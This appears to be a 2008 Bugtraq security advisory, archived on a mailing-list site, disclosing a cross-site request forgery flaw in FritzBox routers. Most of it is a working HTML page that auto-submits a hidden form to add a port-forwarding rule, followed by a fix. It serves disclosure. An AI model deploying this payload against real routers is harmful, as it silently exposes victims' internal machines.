| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 26 Sep 2008 14:03:03 -0600 From: biglowbird@...glemail.com To: bugtraq@...urityfocus.com Subject: FtitzBox ###################################### # Exploitation: Remote with browser # Exploit: Available # Impact: Medium # Fix: N/A ###################################### #################### - Description: #################### Via XSRF change settings in FritzBox. #################### - Vulnerability: #################### XSRF vulnerability, when you use the FritzBox without passwort login #################### - example Exploit for Portforwarding: #################### <html> <body onLoad="javascript:document.form.submit()"> <form action="http://www.fritz.box/cgi-bin/webcm" method="POST" name="form"> <input type="hidden" value="getpage" value="../html/de/menus/menu2.html"> <input type="hidden" name="errorpage" value="../html/de/menus/menu2.html"> <input type="hidden" name="var:lang" value="de"> <input type="hidden" name="var:pagename" value="portfw"> <input type="hidden" name="var:errorpagename" value="portrule"> <input type="hidden" name="var:menu" value="internet"> <input type="hidden" name="var:pagemaster" value=""> <input type="hidden" name="var:rule" value="rule3"> <input type="hidden" name="var:isnew" value="1"> <input type="hidden" name="var:isexp" value="0"> <input type="hidden" name="forwardrules:settings/rule3/activated" value="1"> <input type="hidden" name="forwardrules:settings/rule3/description" value="HTTP-Server"> <input type="hidden" name="forwardrules:settings/rule3/protocol" value="TCP"> <input type="hidden" name="forwardrules:settings/rule3/port" value="80"> <input type="hidden" name="forwardrules:settings/rule3/endport" value="80"> <input type="hidden" name="forwardrules:settings/rule3/fwip" value="192.168.178.24"> <input type="hidden" name="forwardrules:settings/rule3/fwport" value="80"> </form> </body> </html> (this is only a example code for portforwarding for other things they are other variables!!!) #################### - Solution: #################### Use FritzBox only with passwort thx to skskilL & NBBN
Powered by blists - more mailing lists